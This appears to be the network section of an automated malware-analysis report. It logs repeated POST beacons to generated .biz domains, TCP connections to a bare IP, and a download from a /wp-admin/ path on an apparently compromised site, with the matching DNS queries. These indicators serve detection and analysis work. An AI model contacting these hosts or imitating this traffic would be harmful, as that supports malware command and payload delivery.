Source: global traffic	HTTP traffic detected: POST /ayk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qpwpqegnfgthpmmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dlmic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xfhqi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /nj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qucjoqpnqvmyats HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qega HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vkbkkro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ymbuxxmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jihtwudooa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sgnslm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mtec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ceqohx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jvioqipfomt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vgeign HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /woumhgcoto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mhcgmys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /crmhxhtb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /evwtpcketpnsmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /anbxlwnko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vfovcnyrge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /tnuhincspou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ynmucsrhqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /stobttwvpufmox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hoftnxoehn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kifvxdykbnmyfcxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /twuuqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cjvae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jshlt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /eccfsowypckinddi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qpmofftfdba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hclqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qpbiwob HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hhfkorwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uack HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rbv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /epwoomrcoonof HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /btmiljbhjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kwpvpynqhxqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ectmddoihjyrxjp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jdoddcjkmiicjrmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bdvsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120

Source: global traffic

HTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: chichometextiles.com

Source: global traffic	DNS traffic detected: DNS query: chichometextiles.com
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic	DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic	DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic	DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic	DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic	DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic	DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic	DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic	DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic	DNS traffic detected: DNS query: gcedd.biz
Source: global traffic	DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic	DNS traffic detected: DNS query: xccjj.biz
Source: global traffic	DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic	DNS traffic detected: DNS query: rynmcq.biz
